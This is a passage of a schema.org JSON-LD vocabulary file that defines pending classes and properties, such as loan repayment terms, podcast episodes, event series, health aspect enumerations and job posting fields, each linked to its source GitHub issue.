"http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/RepaymentSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "Frequency of payments due, i.e. number of months between payments. This is defined as a frequency, i.e. the reciprocal of a period of time.", "rdfs:label": "loanPaymentFrequency" }, { "@id": "http://schema.org/MisconceptionsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Content about common misconceptions and myths that are related to a topic.", "rdfs:label": "MisconceptionsHealthAspect" }, { "@id": "http://schema.org/GeospatialGeometry", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1375" }, "http://schema.org/category": "issue-1375", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "(Eventually to be defined as) a supertype of GeoShape designed to accommodate definitions from Geo-Spatial best practices.", "rdfs:label": "GeospatialGeometry", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/callSign", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2109" }, "http://schema.org/category": "issue-2109", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/BroadcastService" }, { "@id": "http://schema.org/Vehicle" }, { "@id": "http://schema.org/Person" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "A <a href=\"https://en.wikipedia.org/wiki/Call_sign\">callsign</a>, as used in broadcasting and radio communications to identify people, radio and TV stations, or vehicles.", "rdfs:label": "callSign", "rdfs:subPropertyOf": { "@id": "http://schema.org/identifier" } }, { "@id": "http://schema.org/includesAttraction", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#IIT-CNR.it" }, { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#Tourism" } ], "http://schema.org/category": "issue-1810", "http://schema.org/domainIncludes": { "@id": "http://schema.org/TouristDestination" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/TouristAttraction" }, "rdfs:comment": "Attraction located at destination.", "rdfs:label": "includesAttraction" }, { "@id": "http://schema.org/unnamedSourcesPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/NewsMediaOrganization" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "For an <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> (typically a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>), a statement about policy on use of unnamed sources and the decision process required.", "rdfs:label": "unnamedSourcesPolicy", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/rxcui", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Drug" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The RxCUI drug identifier from RXNORM.", "rdfs:label": "rxcui" }, { "@id": "http://schema.org/PodcastEpisode", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/373" }, "http://schema.org/category": "issue-373", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A single episode of a podcast series.", "rdfs:label": "PodcastEpisode", "rdfs:subClassOf": { "@id": "http://schema.org/Episode" } }, { "@id": "http://schema.org/Observation", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Instances of the class <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a> are used to specify observations about an entity (which may or may not be an instance of a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a>), at a particular time. The principal properties of an <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a> are <a class=\"localLink\" href=\"http://schema.org/observedNode\">observedNode</a>, <a class=\"localLink\" href=\"http://schema.org/measuredProperty\">measuredProperty</a>, <a class=\"localLink\" href=\"http://schema.org/measuredValue\">measuredValue</a> (or <a class=\"localLink\" href=\"http://schema.org/median\">median</a>, etc.) and <a class=\"localLink\" href=\"http://schema.org/observationDate\">observationDate</a> (<a class=\"localLink\" href=\"http://schema.org/measuredProperty\">measuredProperty</a> properties can, but need not always, be W3C RDF Data Cube \"measure properties\", as in the <a href=\"https://www.w3.org/TR/vocab-data-cube/#dsd-example\">lifeExpectancy example</a>).\nSee also <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a>, and the <a href=\"/docs/data-and-datasets.html\">data and datasets</a> overview for more details.", "rdfs:label": "Observation", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/CorrectionComment", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1950" }, "http://schema.org/category": "issue-1950", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/comment\">comment</a> that corrects <a class=\"localLink\" href=\"http://schema.org/CreativeWork\">CreativeWork</a>.", "rdfs:label": "CorrectionComment", "rdfs:subClassOf": { "@id": "http://schema.org/Comment" } }, { "@id": "http://schema.org/quarantineGuidelines", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/WebContent" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "Guidelines about quarantine rules, e.g. in the context of a pandemic.", "rdfs:label": "quarantineGuidelines" }, { "@id": "http://schema.org/RisksOrComplicationsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Information about the risk factors and possible complications that may follow a topic.", "rdfs:label": "RisksOrComplicationsHealthAspect" }, { "@id": "http://schema.org/applicationContact", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2396" }, "http://schema.org/category": "issue-2396", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/ContactPoint" }, "rdfs:comment": "Contact details for further information relevant to this job posting.", "rdfs:label": "applicationContact" }, { "@id": "http://schema.org/Schedule", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A schedule defines a repeating time period used to describe a regularly occurring <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a>. At a minimum a schedule will specify <a class=\"localLink\" href=\"http://schema.org/repeatFrequency\">repeatFrequency</a> which describes the interval between occurences of the event. Additional information can be provided to specify the schedule more precisely.\n This includes identifying the day(s) of the week or month when the recurring event will take place, in addition to its start and end time. Schedules may also\n have start and end dates to indicate when they are active, e.g. to define a limited calendar of events.", "rdfs:label": "Schedule", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/Poster", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1448" }, "http://schema.org/category": "issue-1448", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A large, usually printed placard, bill, or announcement, often illustrated, that is posted to advertise or publicize something.", "rdfs:label": "Poster", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/jobStartDate", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2244" }, "http://schema.org/category": "issue-2244", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/Date" } ], "rdfs:comment": "The date on which a successful applicant for this job would be expected to start work. Choose a specific date in the future or use the jobImmediateStart property to indicate the position is to be filled as soon as possible.", "rdfs:label": "jobStartDate" }, { "@id": "http://schema.org/webFeed", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/373" }, "http://schema.org/category": "issue-373", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PodcastSeries" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DataFeed" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "The URL for a feed, e.g. associated with a podcast series, blog, or series of date-stamped updates. This is usually RSS or Atom.", "rdfs:label": "webFeed" }, { "@id": "http://schema.org/SideEffectsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Side effects that can be observed from the usage of the topic.", "rdfs:label": "SideEffectsHealthAspect" }, { "@id": "http://schema.org/maintainer", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2311" }, "http://schema.org/category": "issue-2311", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Organization" }, { "@id": "http://schema.org/Person" } ], "rdfs:comment": "A maintainer of a <a class=\"localLink\" href=\"http://schema.org/Dataset\">Dataset</a>, software package (<a class=\"localLink\" href=\"http://schema.org/SoftwareApplication\">SoftwareApplication</a>), or other <a class=\"localLink\" href=\"http://schema.org/Project\">Project</a>. A maintainer is a <a class=\"localLink\" href=\"http://schema.org/Person\">Person</a> or <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a> that manages contributions to, and/or publication of, some (typically complex) artifact. It is common for distributions of software and data to be based on \"upstream\" sources. When <a class=\"localLink\" href=\"http://schema.org/maintainer\">maintainer</a> is applied to a specific version of something e.g. a particular version or packaging of a <a class=\"localLink\" href=\"http://schema.org/Dataset\">Dataset</a>, it is always possible that the upstream source has a different maintainer. The <a class=\"localLink\" href=\"http://schema.org/isBasedOn\">isBasedOn</a> property can be used to indicate such relationships between datasets to make the different maintenance roles clear. Similarly in the case of software, a package may have dedicated maintainers working on integration into software distributions such as Ubuntu, as well as upstream maintainers of the underlying work.", "rdfs:label": "maintainer" }, { "@id": "http://schema.org/SatiricalArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An <a class=\"localLink\" href=\"http://schema.org/Article\">Article</a> whose content is primarily <a href=\"https://en.wikipedia.org/wiki/Satire\">[satirical]</a> in nature, i.e. unlikely to be literally true. A satirical article is sometimes but not necessarily also a <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a>. <a class=\"localLink\" href=\"http://schema.org/ScholarlyArticle\">ScholarlyArticle</a>s are also sometimes satirized.", "rdfs:label": "SatiricalArticle", "rdfs:subClassOf": { "@id": "http://schema.org/Article" } }, { "@id": "http://schema.org/beneficiaryBank", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MoneyTransfer" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/BankOrCreditUnion" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "A bank or bank’s branch, financial institution or international financial institution operating the beneficiary’s bank account or releasing funds for the beneficiary", "rdfs:label": "beneficiaryBank" }, { "@id": "http://schema.org/healthPlanId", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The 14-character, HIOS-generated Plan ID number. (Plan IDs must be unique, even across different markets.)", "rdfs:label": "healthPlanId" }, { "@id": "http://schema.org/MerchantReturnNotPermitted", "@type": "http://schema.org/MerchantReturnEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MerchantReturnNotPermitted: product returns are not permitted.", "rdfs:label": "MerchantReturnNotPermitted" }, { "@id": "http://schema.org/EducationalOccupationalProgram", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A program offered by an institution which determines the learning progress to achieve an outcome, usually a credential like a degree or certificate. This would define a discrete set of opportunities (e.g., job, courses) that together constitute a program with a clear start, end, set of requirements, and transition to a new occupational opportunity (e.g., a job), or sometimes a higher educational opportunity (e.g., an advanced degree).", "rdfs:label": "EducationalOccupationalProgram", "rdfs:subClassOf": { "@id": "http://schema.org/Intangible" } }, { "@id": "http://schema.org/CausesHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Information about the causes and main actions that gave rise to the topic.", "rdfs:label": "CausesHealthAspect" }, { "@id": "http://schema.org/EventSeries", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/447" }, "http://schema.org/category": "issue-447", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A series of <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a>s. Included events can relate with the series using the <a class=\"localLink\" href=\"http://schema.org/superEvent\">superEvent</a> property.<br/><br/>\n\nAn EventSeries is a collection of events that share some unifying characteristic. For example, \"The Olympic Games\" is a series, which\nis repeated regularly. The \"2012 London Olympics\" can be presented both as an <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> in the series \"Olympic Games\", and as an\n<a class=\"localLink\" href=\"http://schema.org/EventSeries\">EventSeries</a> that included a number of sporting competitions as Events.<br/><br/>\n\nThe nature of the association between the events in an <a class=\"localLink\" href=\"http://schema.org/EventSeries\">EventSeries</a> can vary, but typical examples could\ninclude a thematic event series (e.g. topical meetups or classes), or a series of regular events that share a location, attendee group and/or organizers.<br/><br/>\n\nEventSeries has been defined as a kind of Event to make it easy for publishers to use it in an Event context without\nworrying about which kinds of series are really event-like enough to call an Event. In general an EventSeries\nmay seem more Event-like when the period of time is compact and when aspects such as location are fixed, but\nit may also sometimes prove useful to describe a longer-term series as an Event.", "rdfs:label": "EventSeries", "rdfs:subClassOf": [ { "@id": "http://schema.org/Series" }, { "@id": "http://schema.org/Event" } ] }, { "@id": "http://schema.org/monthlyMinimumRepaymentAmount", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreditCard" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Number" }, { "@id": "http://schema.org/MonetaryAmount" } ], "rdfs:comment": "The minimum payment is the lowest amount of money that one is required to pay on a credit card statement each month.", "rdfs:label": "monthlyMinimumRepaymentAmount" }, { "@id": "http://schema.org/legislationPassedBy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Person" }, { "@id": "http://schema.org/Organization" } ], "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#passed_by" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#passed_by" }, "rdfs:comment": "The person or organization that originally passed or made the law : typically parliament (for primary legislation) or government (for secondary legislation). This indicates the \"legal author\" of the law, as opposed to its physical author.", "rdfs:label": "legislationPassedBy", "rdfs:subPropertyOf": { "@id": "http://schema.org/creator" } }, { "@id": "http://schema.org/scheduleTimezone", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Indicates the timezone for which the time(s) indicated in the <a class=\"localLink\" href=\"http://schema.org/Schedule\">Schedule</a> are given. The value provided should be among those listed in the IANA Time Zone Database.", "rdfs:label": "scheduleTimezone" }, { "@id": "http://schema.org/loanMortgageMandateAmount", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MortgageLoan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/MonetaryAmount" }, "rdfs:comment": "Amount of mortgage mandate that can be converted into a proper mortgage at a later stage.", "rdfs:label": "loanMortgageMandateAmount" }, { "@id": "http://schema.org/HealthAspectEnumeration", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "HealthAspectEnumeration enumerates several aspects of health content online, each of which might be described using <a class=\"localLink\" href=\"http://schema.org/hasHealthAspect\">hasHealthAspect</a> and <a class=\"localLink\" href=\"http://schema.org/HealthTopicContent\">HealthTopicContent</a>.", "rdfs:label": "HealthAspectEnumeration", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/inDefinedTermSet", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/domainIncludes": { "@id": "http://schema.org/DefinedTerm" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DefinedTermSet" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/DefinedTermSet\">DefinedTermSet</a> that contains this term.", "rdfs:label": "inDefinedTermSet", "rdfs:subPropertyOf": { "@id": "http://schema.org/isPartOf" } }, { "@id": "http://schema.org/ContagiousnessHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Content about contagion mechanisms and contagiousness information over the topic.", "rdfs:label": "ContagiousnessHealthAspect" }, { "@id": "http://schema.org/OnlineEventAttendanceMode", "@type": "http://schema.org/EventAttendanceModeEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "OnlineEventAttendanceMode - an event that is primarily conducted online.", "rdfs:label": "OnlineEventAttendanceMode" }, { "@id": "http://schema.org/XPathType", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1672" }, "http://schema.org/category": "issue-1672", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Text representing an XPath (typically but not necessarily version 1.0).", "rdfs:label": "XPathType", "rdfs:subClassOf": { "@id": "http://schema.org/Text" } }, { "@id": "http://schema.org/sdLicense", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1886" }, "http://schema.org/category": "issue-1886", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "A license document that applies to this structured data, typically indicated by URL.", "rdfs:label": "sdLicense" }, { "@id": "http://schema.org/byMonth", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1457" }, "http://schema.org/category": "issue-1457", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Schedule" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "Defines the month(s) of the year on which a recurring <a class=\"localLink\" href=\"http://schema.org/Event\">Event</a> takes place. Specified as an <a class=\"localLink\" href=\"http://schema.org/Integer\">Integer</a> between 1-12. January is 1.", "rdfs:label": "byMonth" }, { "@id": "http://schema.org/securityClearanceRequirement", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2384" }, "http://schema.org/category": "issue-2384", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "A description of any security clearance requirements of the job.", "rdfs:label": "securityClearanceRequirement" }, { "@id": "http://schema.org/ineligibleRegion", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2242" }, "http://schema.org/category": "issue-2242", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/DeliveryChargeSpecification" }, { "@id": "http://schema.org/Demand" }, { "@id": "http://schema.org/Offer" }, { "@id": "http://schema.org/ActionAccessSpecification" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/GeoShape" }, { "@id": "http://schema.org/Place" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The ISO 3166-1 (ISO 3166-1 alpha-2) or ISO 3166-2 code, the place, or the GeoShape for the geo-political region(s) for which the offer or delivery charge specification is not valid, e.g. a region where the transaction is not allowed.<br/><br/>\n\nSee also <a class=\"localLink\" href=\"http://schema.org/eligibleRegion\">eligibleRegion</a>.", "rdfs:label": "ineligibleRegion" }, { "@id": "http://schema.org/startOffset", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2021" }, "http://schema.org/category": "issue-2021", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Clip" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "The start time of the clip expressed as the number of seconds from the beginning of the work.", "rdfs:label": "startOffset" }, { "@id": "http://schema.org/hasCredential", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Person" }, { "@id": "http://schema.org/Organization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/EducationalOccupationalCredential" }, "rdfs:comment": "A credential awarded to the Person or Organization.", "rdfs:label": "hasCredential" }, { "@id": "http://schema.org/educationalProgramMode", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2419" }, "http://schema.org/category": "issue-2419", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "Similar to courseMode, The medium or means of delivery of the program as a whole. The value may either be a text label (e.g. \"online\", \"onsite\" or \"blended\"; \"synchronous\" or \"asynchronous\"; \"full-time\" or \"part-time\") or a URL reference to a term from a controlled vocabulary (e.g. https://ceds.ed.gov/element/001311#Asynchronous ).", "rdfs:label": "educationalProgramMode" }, { "@id": "http://schema.org/EventAttendanceModeEnumeration", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An EventAttendanceModeEnumeration value is one of potentially several modes of organising an event, relating to whether it is online or offline.", "rdfs:label": "EventAttendanceModeEnumeration", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/verificationFactCheckingPolicy", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": { "@id": "http://schema.org/NewsMediaOrganization" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/CreativeWork" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "Disclosure about verification and fact-checking processes for a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a> or other fact-checking <a class=\"localLink\" href=\"http://schema.org/Organization\">Organization</a>.", "rdfs:label": "verificationFactCheckingPolicy", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/membershipPointsEarned", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2085" }, "http://schema.org/category": "issue-2085", "http://schema.org/domainIncludes": { "@id": "http://schema.org/ProgramMembership" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Number" }, { "@id": "http://schema.org/QuantitativeValue" } ], "rdfs:comment": "The number of membership points earned by the member. If necessary, the unitText can be used to express the units the points are issued in. (e.g. stars, miles, etc.)", "rdfs:label": "membershipPointsEarned" }, { "@id": "http://schema.org/includedInHealthInsurancePlan", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": 